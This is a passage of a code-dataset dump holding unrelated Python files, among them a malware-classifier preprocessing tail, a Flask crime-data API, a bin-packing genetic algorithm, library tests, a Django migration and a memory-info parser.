onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n X = np.concatenate((Z, X), 1)\n \n # Scaling\n sc_X = StandardScaler()\n X = sc_X.fit_transform(X)\n \n return X, y\n\nX, y = getXY('/home/yash/Documents/Malware_Classifier_For_PE_Files/cleaned_data.csv')\n\n# train test split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n### ----------------- RF -------------------- ###\nfrom Models.Logistic import Logistic\nmodel = Logistic(X_train, y_train)\n\ny_pred = model.predict(X_test)\n\ncount = 0\nfor i in range(len(y_pred)):\n if y_pred[i] == y_test[i]:\n count += 1\n\nacc = (count / len(y_pred)) * 100\nprint('Logistic Reg: {}'.format(acc))\n\n### ----------------------------------------- ###","sub_path":"01_data_preprocessing.py","file_name":"01_data_preprocessing.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435046642","text":"import werkzeug\r\n\r\nwerkzeug.cached_property = werkzeug.utils.cached_property\r\nfrom flask import Flask\r\nfrom flask_restplus import Api, Resource\r\nfrom connector import construct_con_str\r\nfrom logic import crimes_between_dates, total_burglary\r\nfrom decorators import Decorators\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = construct_con_str()\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\r\n\r\napi = Api(app)\r\nns = 
api.namespace(\"rest\", description=\"Assignment Rest\")\r\n\r\n\r\n@ns.route(\"/<fromdate>=<todate>\")\r\n@api.response(404, \"Nothing here but us lemmings\")\r\nclass ResToFrom(Resource):\r\n    def get(self, fromdate, todate):\r\n        return crimes_between_dates(fromdate, todate)\r\n\r\n    def post(self, fromdate, todate):\r\n        # I don't see the point in making a post method here as per the assignment desc...\r\n        return None, 201\r\n\r\n\r\n@ns.route(\"/burglary\")\r\n@api.response(404, \"Nothing here but us lemmings\")\r\nclass ResBurglary(Resource):\r\n    def get(self):\r\n        return total_burglary()\r\n\r\n\r\n@Decorators.determine_environment\r\ndef flask_run():\r\n    conf = configparser.ConfigParser()\r\n    conf.read(\"configuration.ini\")\r\n\r\n    if conf[\"DEFAULT\"][\"activeenvironment\"] == \"PRODUCTION\":\r\n        app.run(host=\"0.0.0.0\")\r\n    else:\r\n        app.run(debug=True)\r\n","sub_path":"week8/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"149295406","text":"import random\nimport sys\nrandom.seed(0)\n\n\nclass Population_element:\n    def __init__(self, vehicle_list, out_number):\n        self.vehicle_list = vehicle_list\n        self.out_number = out_number\n\nclass Vehicle:\n    def __init__(self, vehicle_number, x, y):\n        self.x = x\n        self.y = y\n        self.number = vehicle_number\n\n    def rotateVehicle(self):\n        temp = self.x\n        self.x = self.y\n        self.y = temp\n\nclass Area:\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n\n    def placement(self, vehicle_list):\n        self.area2d = [[0 for y in range(self.y)] for y in range(self.x)]\n        for vehicle in vehicle_list:\n            control = False\n            for i in range(self.x):\n                for j in range(self.y):\n                    if ((not control) and self.check_area(vehicle, (i,j))):\n                        for x in range(vehicle.x):\n                            for y in range(vehicle.y):\n                                self.area2d[i+x][j+y] = vehicle.number\n                        control = True\n        return self.calculate_out_vehicles(vehicle_list)\n\n    def check_area(self, vehicle, cordinate):\n        i,j = cordinate\n        x, y = vehicle.x, vehicle.y\n        if ((x + i > self.x) or (y + j > self.y)):\n            return False\n        for k in range(x):\n            for l in range(y):\n                if ((not self.area2d[i+k][j+l] == 0)):\n                    return False\n        return True\n\n    def calculate_out_vehicles(self, vehicle_list):\n        count = 0\n        for vehicle in vehicle_list:\n            if (not any(vehicle.number in sublist for sublist in self.area2d)):\n                count += 1\n        return count\n\n    def print_area(self):\n        for i in range(0,self.x):\n            for j in range(0,self.y):\n                if j < self.y-1:\n                    print(self.area2d[i][j], end=\"\\t\", file=sys.stdout)\n                else:\n                    print(self.area2d[i][j], end=\"\", file=sys.stdout)\n            #if i < self.x-1:\n            print(\"\\n\", end=\"\", file=sys.stdout)\n\nclass GA:\n    def __init__(self, area, vehicle_list1, vehicle_list2):\n        self.area = area\n        self.vehicleList1 = vehicle_list1\n        self.vehicleList2 = vehicle_list2\n        self.parent1 = random.sample(vehicle_list1, len(vehicle_list1))\n        self.parent2 = random.sample(vehicle_list2, len(vehicle_list2))\n\n    def crossover(self):\n        rand1 = random.randint(0, len(self.parent1))\n        rand2 = random.randint(rand1, len(self.parent1))\n\n        self.child1 = self.parent1[rand1:rand2] # Multiple point Cross over\n        for elem in self.parent2:\n            if not elem in self.child1:\n                self.child1.append(elem)\n\n        rand1 = random.randint(0, len(self.parent2))\n        rand2 = random.randint(rand1, len(self.parent2))\n\n        self.child2 = self.parent2[rand1:rand2]\n        for elem in self.parent1:\n            if not elem in self.child2:\n                self.child2.append(elem)\n\n    def evaluation(self):\n        population_array = 
[Population_element(self.parent1, self.area.placement(self.parent1)),\n Population_element(self.parent2, self.area.placement(self.parent2)),\n Population_element(self.child1, self.area.placement(self.child1)),\n Population_element(self.child2, self.area.placement(self.child2))]\n sorted_population_array = sorted(population_array, key=lambda x: x.out_number)\n self.parent1, self.parent2 = sorted_population_array[0].vehicle_list, sorted_population_array[1].vehicle_list\n if sorted_population_array[0].out_number == 0:\n return self.parent1\n if sorted_population_array[1].out_number == 0:\n return self.parent2\n return None\n\n def mutation(self):\n random1 = random.randint(0, len(self.parent2)-1)\n random2 = random.randint(0, len(self.parent2)-1)\n temp = self.parent2[random1]\n self.parent2[random1] = self.parent2[random2]\n self.parent2[random2] = temp\n\n def mutation2(self):\n if(len(self.parent1) < 15):\n random1 = random.randint(0, len(self.parent2)-int(len(self.parent2)/2)) \n self.parent2[random1].rotateVehicle()\n random2 = random.randint(random1, len(self.parent2)-1) \n self.parent2[random2].rotateVehicle()\n elif(len(self.parent1) >= 15 and len(self.parent1) <= 34):\n ctr=0 \n for i in range(0,int(len(self.parent2)/5)-1,1):\n random1 = random.randint(ctr, ctr+4)\n ctr+=5 \n self.parent2[random1].rotateVehicle()\n else:\n ctr=0 \n for i in range(0,int(len(self.parent2)/5)-1,1):\n random1 = random.randint(ctr, ctr+4)\n ctr+=5 \n self.parent2[random1].rotateVehicle()\n\nif __name__==\"__main__\": # \n firstInput = input()\n while (firstInput == \" \\n\" or firstInput == \"\\n\" or len(firstInput.split()) != 2):\n firstInput = input()\n splittedFirst = firstInput.split() # \\t\n areaX = splittedFirst[0]\n areaY = splittedFirst[1]\n area = Area(int(areaX), int(areaY)) #\n numVehicle = int(input()) # Get user input for number of vehicles\n vehicle_list1 = [] # \n vehicle_list2 = [] #\n #----------------------------------------------------------------------------------------\n for i in range(1,numVehicle+1,1): #\n vehSize = input().split() # \\t\n x = vehSize[0]\n y = vehSize[1] # \n vehicle_list1.append(Vehicle(i,int(x),int(y))) # Parent 1 # Create Vehicle object \n vehicle_list2.append(Vehicle(i,int(y),int(x))) # Rotated Parent 2 # Create Vehicle object after rotating process \n #totalVehicleArea += int(x) * int(y) # \n #print(\"Total Vehicle Area => \", totalVehicleArea) # Remove !!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n #----------------------------------------------------------------------------------------\n if (len(vehicle_list1) < 26 ):\n counterMt1 = 20\n counterMt2 = 900\n elif (len(vehicle_list1) >= 27) and (len(vehicle_list1) < 30 ):\n counterMt1 = 700\n counterMt2 = 100\n elif (len(vehicle_list1) >= 30) and (len(vehicle_list1) < 35 ):\n counterMt1 = 10\n counterMt2 = 500\n else:\n counterMt1 = 53\n counterMt2 = 13\n #------------------------------------------------------------------------------------\n ga = GA(area, vehicle_list1, vehicle_list2) # Create GA object by using 2 different parent argument\n result = vehicle_list1 # \n counter=0 # \n while(True):\n counter += 1 #\n ga.crossover() # \n result = ga.evaluation() # \n if result is not None: # \n area.placement(result) # \n area.print_area() # \n break\n if counter%counterMt1: # \n ga.mutation() # \n if counter%counterMt2: #\n ga.mutation2() #\n 
","sub_path":"bin_packing.py","file_name":"bin_packing.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606578898","text":"import os\nimport time\nimport threading\n\nimport pytest\n\nfrom doit.filewatch import FileModifyWatcher, get_platform_system\n\n\ndef testUnsuportedPlatform(monkeypatch):\n monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())\n pytest.raises(Exception, FileModifyWatcher, [])\n\n\nplatform = get_platform_system()\n@pytest.mark.skipif('platform not in FileModifyWatcher.supported_platforms')\nclass TestFileWatcher(object):\n def testInit(self, restore_cwd, tmpdir):\n dir1 = 'data3'\n files = ('data/w1.txt', 'data/w2.txt')\n tmpdir.mkdir('data')\n for fname in files:\n tmpdir.join(fname).open('a').close()\n os.chdir(tmpdir.strpath)\n\n fw = FileModifyWatcher((files[0], files[1], dir1))\n # file_list contains absolute paths\n assert 2 == len(fw.file_list)\n assert os.path.abspath(files[0]) in fw.file_list\n assert os.path.abspath(files[1]) in fw.file_list\n # watch_dirs\n assert 2 == len(fw.watch_dirs)\n assert tmpdir.join('data') in fw.watch_dirs\n assert tmpdir.join('data3') in fw.watch_dirs\n # notify_dirs\n assert 1 == len(fw.notify_dirs)\n assert tmpdir.join('data3') in fw.notify_dirs\n\n\n def testHandleEventNotSubclassed(self):\n fw = FileModifyWatcher([])\n pytest.raises(NotImplementedError, fw.handle_event, None)\n\n def testLoop(self, restore_cwd, tmpdir):\n files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']\n stop_file = 'data/stop'\n tmpdir.mkdir('data')\n for fname in files + [stop_file]:\n tmpdir.join(fname).open('a').close()\n os.chdir(tmpdir.strpath)\n\n fw = FileModifyWatcher((files[0], files[1], stop_file))\n events = []\n should_stop = []\n started = []\n def handle_event(event):\n events.append(event.src_path)\n\n fw.handle_event = handle_event\n\n fw.loop()\n time.sleep(1)\n # write in watched file\n fd = open(files[0], 'w')\n fd.write(\"hi\")\n fd.close()\n # write in non-watched file\n fd = open(files[2], 'w')\n fd.write(\"hi\")\n fd.close()\n # write in another watched file\n fd = open(files[1], 'w')\n fd.write(\"hi\")\n fd.close()\n time.sleep(1)\n fw.observer.stop()\n fw.observer.join(1)\n\n assert os.path.abspath(files[0]) in events\n assert os.path.abspath(files[1]) in events\n","sub_path":"tests/test_filewatch.py","file_name":"test_filewatch.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"553798552","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云 - 监控平台 (BlueKing - Monitor) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\n# Generated by Django 1.11.23 on 2021-07-08 03:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"bkmonitor\", \"0038_merge_20210707_1731\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"detectalgorithm\",\n name=\"algorithm_type\",\n field=models.CharField(\n choices=[\n (\"Threshold\", \"静态阈值算法\"),\n (\"SimpleRingRatio\", \"简易环比算法\"),\n (\"AdvancedRingRatio\", \"高级环比算法\"),\n (\"SimpleYearRound\", \"简易同比算法\"),\n (\"AdvancedYearRound\", \"高级同比算法\"),\n (\"PartialNodes\", \"部分节点数算法\"),\n (\"OsRestart\", \"主机重启算法\"),\n (\"ProcPort\", \"进程端口算法\"),\n (\"PingUnreachable\", \"Ping不可达算法\"),\n (\"YearRoundAmplitude\", \"同比振幅算法\"),\n (\"YearRoundRange\", \"同比区间算法\"),\n (\"RingRatioAmplitude\", \"环比振幅算法\"),\n (\"IntelligentDetect\", \"智能异常检测算法\"),\n ],\n max_length=128,\n verbose_name=\"算法类型\",\n ),\n ),\n ]\n","sub_path":"bkmonitor/migrations/0039_auto_20210708_1117.py","file_name":"0039_auto_20210708_1117.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506907118","text":"#!/usr/bin/env python\n\nfrom math import *\nimport sys\n\na0 = 5.29e-9;\n\ndef calc_force_cor(x, q):\n\tbeta = 1.0\n\tl = 9.0 * a0\n\n\tdx = x[0] - x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1] * beta\n\tf = numeric * ( -1.0/(r*r) * (1.0 - exp( (-r * r) / (l * l) )) + 2.0/(l*l) * exp((-r*r)/(l*l)) )\n\treturn f*dx/r\n\ndef calc_force(x, q):\n\tdx = x[0] -x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = (-1.0) *q[0] * q[1]\n\t\n\tf_norm = numeric * (1.0/(r * r))\n\n\tf = f_norm*dx/r\n\treturn f;\n\ndef calc_potential_cor(x, q):\n\tbeta = 1.0\n\tl = 9.0 * a0;\n\n\tdx = x[0] - x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1] * beta\n\tu = numeric * (1.0/r) * (1.0 - exp( (-r * r) / (l * l) ))\n\treturn u\n\n#def calc_force(x, q):\n\ndef calc_potential(x, q):\n\tdx = x[0] -x[1]\n\tr = sqrt(dx*dx)\n\tnumeric = q[0] * q[1]\n\tu = numeric * (1.0/r)\n\treturn u\n\t\nx = [0.0]*2\nm = [0.0]*2\nq = [0.0]*2\n\n#0 = electron\n#1 = proton\nm[0] = 9.1e-28\nm[1] = 1.67e-24\nq[0] = -4.8e-10\nq[1] = 4.8e-10\n\nx[1] = 0.0\n\npot_cor = open('pot_cor', 'w')\nforce_cor = open('force_cor', 'w')\npot = open('pot', 'w')\nforce = open('force', 'w')\npot_cor.write(\"#Dist\\tUnlike\\n\")\nforce_cor.write(\"#Dist\\tUnlike\\n\")\npot.write(\"#Dist\\tUnlike\\n\")\nforce.write(\"#Dist\\tUnlike\\n\")\n\n\nfor i in range(1,101):\n\tx[0] = float(i) * a0\n\tpot_cor.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_potential_cor(x,q)))\n\tforce_cor.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_force_cor(x,q)))\n\tpot.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_potential(x,q)))\n\tforce.write(\"%f\\t%g\\n\" % (float((x[0]-x[1])/a0), calc_force(x,q)))\n\t\n\npot_cor.close()\nforce_cor.close()\npot.close()\nforce.close()\n\n\t\n","sub_path":"scripts/force.py","file_name":"force.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"205504944","text":"r\"\"\"Test `lmp.util.load_dataset.`.\n\nUsage:\n python -m unittest test.lmp.util._dataset.test_load_dataset\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import 
unicode_literals\n\nimport inspect\nimport math\nimport unittest\n\nfrom typing import Union\n\n# self-made modules\n\nimport lmp.dataset\nimport lmp.util\n\n\nclass TestLoadDataset(unittest.TestCase):\n r\"\"\"Test case for `lmp.util.load_dataset`.\"\"\"\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n\n self.assertEqual(\n inspect.signature(lmp.util.load_dataset),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='dataset',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=str,\n default=inspect.Parameter.empty\n )\n ],\n return_annotation=Union[\n lmp.dataset.AnalogyDataset,\n lmp.dataset.LanguageModelDataset\n ]\n ),\n msg=msg\n )\n\n def test_invalid_input_dataset(self):\n r\"\"\"Raise exception when input `dataset` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` or `ValueError` when input `dataset` is '\n 'invalid.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, '', b'', (), [], {}, set(), object(),\n lambda x: x, type, None, NotImplemented, ...\n )\n\n for invalid_input in examples:\n with self.assertRaises(\n (TypeError, ValueError),\n msg=msg1\n ) as ctx_man:\n lmp.util.load_dataset(invalid_input)\n\n if isinstance(ctx_man.exception, TypeError):\n self.assertEqual(\n ctx_man.exception.args[0],\n '`dataset` must be an instance of `str`.',\n msg=msg2\n )\n else:\n self.assertEqual(\n ctx_man.exception.args[0],\n f'dataset `{invalid_input}` does not support.\\nSupported options:' +\n ''.join(list(map(\n lambda option: f'\\n\\t--dataset {option}',\n [\n 'news_collection_desc',\n 'news_collection_title',\n 'wiki_test_tokens',\n 'wiki_train_tokens',\n 'wiki_valid_tokens',\n 'word_test_v1'\n ]\n ))),\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `Union[lmp.dataset.LanguageModelDataset, lmp.dataset.AnalogyDataset]`.\"\"\"\n msg = 'Must return `Union[lmp.dataset.LanguageModelDataset, lmp.dataset.AnalogyDataset]`.'\n\n examples = (\n ('news_collection_desc', lmp.dataset.LanguageModelDataset),\n ('news_collection_title', lmp.dataset.LanguageModelDataset),\n ('wiki_train_tokens', lmp.dataset.LanguageModelDataset),\n ('wiki_test_tokens', lmp.dataset.LanguageModelDataset),\n ('wiki_valid_tokens', lmp.dataset.LanguageModelDataset),\n ('word_test_v1', lmp.dataset.AnalogyDataset),\n )\n\n for dataset, dataset_cstr in examples:\n self.assertIsInstance(\n lmp.util.load_dataset(dataset=dataset),\n dataset_cstr,\n msg=msg\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/util/_dataset/test_load_dataset.py","file_name":"test_load_dataset.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491732949","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016 Supreeth Herle\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"VBS Stats Module.\"\"\"\n\nfrom empower.vbsp.messages import statistics_pb2\nfrom empower.vbsp.messages import configs_pb2\n\nPRT_VBSP_RRC_STATS = \"mRRC_meas\"\n\nRRC_STATS_RAT_TYPE = {\n \"EUTRA\": statistics_pb2.RAT_EUTRA\n}\n\nRRC_STATS_REPORT_CONF_TYPE = \\\n [\"periodical_ref_signal\", \"A1\", \"A2\", \"A3\", \"A4\", \"A5\"]\n\nRRC_STATS_EVENT_THRESHOLD_TYPE = [\"RSRP\", \"RSRQ\"]\n\nRRC_STATS_TRIGGER_QUANT = {\n \"RSRP\": configs_pb2.TRIGQ_RSRP,\n \"RSRQ\": configs_pb2.TRIGQ_RSRQ\n}\n\nRRC_STATS_REPORT_INTR = {\n 1: configs_pb2.REPINT_ms1024,\n 2: configs_pb2.REPINT_ms2048,\n 5: configs_pb2.REPINT_ms5120,\n 10: configs_pb2.REPINT_ms10240,\n 60: configs_pb2.REPINT_min1,\n 360: configs_pb2.REPINT_min6,\n 720: configs_pb2.REPINT_min12,\n 1800: configs_pb2.REPINT_min30,\n 3600: configs_pb2.REPINT_min60\n}\n\nRRC_STATS_NUM_REPORTS = {\n 1: configs_pb2.REPAMT_1,\n 2: configs_pb2.REPAMT_2,\n 4: configs_pb2.REPAMT_4,\n 8: configs_pb2.REPAMT_8,\n 16: configs_pb2.REPAMT_16,\n 32: configs_pb2.REPAMT_32,\n 64: configs_pb2.REPAMT_64,\n \"infinite\": configs_pb2.REPAMT_infinity\n}\n\nRRC_STATS_BW = {\n 6: configs_pb2.AMBW_6,\n 15: configs_pb2.AMBW_15,\n 25: configs_pb2.AMBW_25,\n 50: configs_pb2.AMBW_50,\n 75: configs_pb2.AMBW_75,\n 100: configs_pb2.AMBW_100\n}\n","sub_path":"empower/vbs_stats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"156797853","text":"# Copyright 2018 D-Wave Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport unittest\n\nimport dimod\nimport hybrid\nfrom hybrid.core import State\nfrom hybrid.concurrency import Present, Future, ImmediateExecutor, immediate_executor\nfrom hybrid.testing import RunTimeAssertionMixin\nfrom hybrid.utils import cpu_count\n\n\nclass TestPresent(unittest.TestCase):\n\n def test_res(self):\n for val in 1, 'x', True, False, State(problem=1), lambda: None:\n f = Present(result=val)\n self.assertIsInstance(f, Future)\n self.assertTrue(f.done())\n self.assertEqual(f.result(), val)\n\n def test_exc(self):\n for exc in ValueError, KeyError, ZeroDivisionError:\n f = Present(exception=exc())\n self.assertIsInstance(f, Future)\n self.assertTrue(f.done())\n self.assertRaises(exc, f.result)\n\n def test_invalid_init(self):\n self.assertRaises(ValueError, Present)\n\n\nclass TestImmediateExecutor(unittest.TestCase):\n\n def test_submit_res(self):\n ie = ImmediateExecutor()\n f = ie.submit(lambda x: not x, True)\n self.assertIsInstance(f, Present)\n self.assertIsInstance(f, Future)\n self.assertEqual(f.result(), False)\n\n def test_submit_exc(self):\n ie = ImmediateExecutor()\n f = ie.submit(lambda: 1/0)\n self.assertIsInstance(f, Present)\n self.assertIsInstance(f, Future)\n self.assertRaises(ZeroDivisionError, f.result)\n\n\nclass TestMultithreading(unittest.TestCase, 
RunTimeAssertionMixin):\n\n def test_concurrent_tabu_samples(self):\n t1 = hybrid.TabuProblemSampler(timeout=1000)\n t2 = hybrid.TabuProblemSampler(timeout=2000)\n workflow = hybrid.Parallel(t1, t2)\n\n bqm = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, 'BINARY')\n state = hybrid.State.from_problem(bqm)\n\n with self.assertRuntimeWithin(1900, 2500):\n workflow.run(state).result()\n\n @unittest.skipUnless(cpu_count() >= 2, \"at least two threads required\")\n def test_concurrent_sa_samples(self):\n s1 = hybrid.SimulatedAnnealingProblemSampler(num_reads=1000, num_sweeps=10000)\n s2 = hybrid.SimulatedAnnealingProblemSampler(num_reads=1000, num_sweeps=10000)\n p = hybrid.Parallel(s1, s2)\n\n bqm = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, 'BINARY')\n state = hybrid.State.from_problem(bqm)\n\n def time_runnable(runnable, init):\n runnable.run(init).result()\n return sum(runnable.timers['dispatch.next'])\n\n t_s1 = time_runnable(s1, state)\n t_s2 = time_runnable(s2, state)\n t_p = time_runnable(p, state)\n\n # parallel execution must not be slower than the longest running branch + 75%\n # NOTE: the extremely weak upper bound was chosen so we don't fail on the\n # unreliable/inconsistent CI VMs, and yet to show some concurrency does exist\n t_expected_max = max(t_s1, t_s2) * 1.75\n\n self.assertLess(t_p, t_expected_max)\n","sub_path":"tests/test_concurrency.py","file_name":"test_concurrency.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"46493424","text":"try:\n\tfrom inits.inits import Inits\nexcept:\n\tfrom inits import Inits\n\n\n\nclass MemData(object):\n\t\"\"\"docstring for MemData\"\"\"\n\t\n\ts=Inits()\n\n\t# convers MB to GB\n\tdef MB_to_GB(self, uInput):\n\t\tgb = 1.0/1024\n\t\tcv = gb * uInput\n\t\treturn \"%.1f\" % cv\n\n\t# returns memory type\n\tdef type(self):\n\t\t\tdata=self.s.find_data(\"memory.txt\", \"Type: DDR\")\n\t\t\ttry:\n\t\t\t\tdata=data.replace('FB-DIMM', '').replace(' ', '')\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tif data:\n\t\t\t\tif data == \"2\":\n\t\t\t\t\treturn \"DDR2\"\n\t\t\t\telif data == \"3\":\n\t\t\t\t\treturn \"DDR3\"\n\n\t\t\tdata=self.s.find_data(\"memory.txt\", \"Type: DD\")\n\t\t\tif 'R' in data:\n\t\t\t\treturn \"DDR2\" \n\n\t\t\treturn \"DATA NOT AVAILABLE\"\n\n\n\t# returns memory speed\n\tdef speed(self):\n\t\tdata=self.s.find_data(\"memory.txt\", \"MHz\", 1)\n\n\t\ttyp=self.s.find_data(\"memory.txt\", \"Type: DDR\")\n\t\ttry:\n\t\t\ttyp=typ.replace('FB-DIMM', '').replace(' ', '')\n\t\texcept:\n\t\t\tpass\n\n\t\tdef spd(speed, data):\n\t\t\tfor key, value in speed.items():\n\t\t\t\tif int(data[1]) == value:\n\t\t\t\t\tklen=len(key.split(\"-\"))\n\t\t\t\t\tif klen > 2:\n\t\t\t\t\t\tk=key.split(\"-\")[0:2]\n\t\t\t\t\t\treturn str(\"-\".join(k))\n\t\t\t\t\treturn(key)\n\n\n\t\tspeed_2={ 'PC2-3200' : 400, 'PC2-4200' : 533, 'PC2-5300' : 667, \n\t\t\t\t 'PC2-6400' : 800, 'PC2-8500' : 1066 }\t\t\t\t\t\n\n\t\tspeed_3={ 'PC3-6400' : 800, 'PC3-8500-1' : 1066, 'PC3-8500-2' : 1067,\n\t\t\t 'PC3-10600-1' : 1333, 'PC3-10600-2' : 1334, 'PC3-12800' : 1600, \n\t\t\t 'PC3-14900' : 1866, 'PC3-17000' : 2133, 'PC3-5300' : 667}\n\n\t\tif (typ == \"2\") or (self.s.find_data(\"memory.txt\", \"Type: DD\")==\"R\"):\n\t\t\t\n\t\t\ttry:\n\t\t\t\ts=spd(speed_2, data)\n\t\t\t\tif s:\n\t\t\t\t\treturn s\n\t\t\t\telse:\n\t\t\t\t\treturn \"DATA UNAVAILABLE\"\n\t\t\texcept:\n\t\t\t\treturn \"DATA UNAVAILABLE\"\n\n\n\t\tif typ == \"3\":\n\t\t\ts=spd(speed_3, data)\n\t\t\tif 
s:\n\t\t\t\treturn s\n\t\t\telse:\n\t\t\t\treturn \"DATA UNAVAILABLE\"\n\t\t\t\t\n\t\ts=spd(speed_3, data)\n\t\treturn s\n\n\n\t# meme size\n\tdef mem_size(self):\n\t\tsize_arr=[]\n\t\twith open(self.s.master_data_dir(1)+\"memory.txt\") as memSize:\n\t\t\tfor size in memSize:\n\t\t\t\tif (\"Size:\" in size) and (\"No Module Installed\" not in size) and (\"(Single-bank Connection)\" not in size) and (\"Maximum Memory Module\" not in size) and (\"Installed Size: Not Installed\" not in size) and (\"Maximum Total Memory Size:\" not in size) and (\"Enabled Size: Not Installed\" not in size) and (\"(Double-bank Connection)\" not in size) and (\"kB\" not in size):\n\t\t\t\t\tsize_arr.append(size.replace('Size: ', '').replace('\\t', '').replace('\\n', '').replace(' MB', ''))\n\n\t\t# return size_arr\n\n\t\tcount=0\n\t\ttotal=0\n\t\twhile count < len(size_arr):\n\t\t\tcount=count +1\n\t\t\ttotal=int(size_arr[count - 1])+total\n\n\n\t\treturn str(self.MB_to_GB(total)+\" GB\")\n\n\n\n\nm=MemData()\n# print(m.type())\n# print(m.speed())\nprint(m.mem_size())","sub_path":"inits/mem_data.py","file_name":"mem_data.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573832401","text":"from __future__ import unicode_literals\n\nfrom _collections import defaultdict\nfrom collections import OrderedDict\nimport json\nimport logging\n\nfrom aldjemy.core import get_engine\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.cache import cache\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db import models\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.utils.encoding import smart_bytes\nimport six\n\nfrom reports import strftime_log\nimport reports.schema as SCHEMA\nfrom reports.serialize import LimsJSONEncoder\n\n\nAPI_ACTION = SCHEMA.VOCAB.apilog.api_action\n\nlogger = logging.getLogger(__name__)\n\ndef dict_strip_unicode_keys(uni_dict):\n \"\"\"\n Convert a dict of unicode keys into a dict of ascii keys.\n\n Useful for converting a dict to a kwarg-able format.\n \n # see tastypie.dict_strip_unicode_keys for original implementation.\n \"\"\"\n if 